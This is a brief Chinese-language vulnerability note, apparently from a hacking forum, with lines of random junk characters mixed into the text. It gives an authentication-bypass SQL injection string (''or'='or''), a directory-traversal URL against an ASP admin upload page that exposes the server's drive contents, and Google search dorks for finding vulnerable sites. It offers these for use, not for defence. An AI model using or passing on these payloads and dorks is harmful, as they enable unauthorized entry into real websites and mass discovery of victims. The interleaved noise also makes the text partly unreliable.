后台万能密码 'or'='or'
9 v8 X+ h/ N# p- I
5 ]* y$ N6 m- V+ o1 }# I后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
! q! M. |" s: T$ M$ Yadmin/uploadfile.asp?currentFolder=/upfiles/../
% f1 @% N& e0 c* t# [3 i' v& h( Q* n4 z, x
漏洞证明:
: t7 r5 X0 Z, [ R2 x) T" v4 I
* A- ~1 v# J% {谷歌:inurl:type.asp?id=1 新闻中心
- B6 s! u/ j% g3 w: D1 }4 N6 v或者 :inurl:download_ok.asp?- m# I$ n$ [5 }' j: m1 F
. [* N% Y/ J, a" L+ F) {( [& U |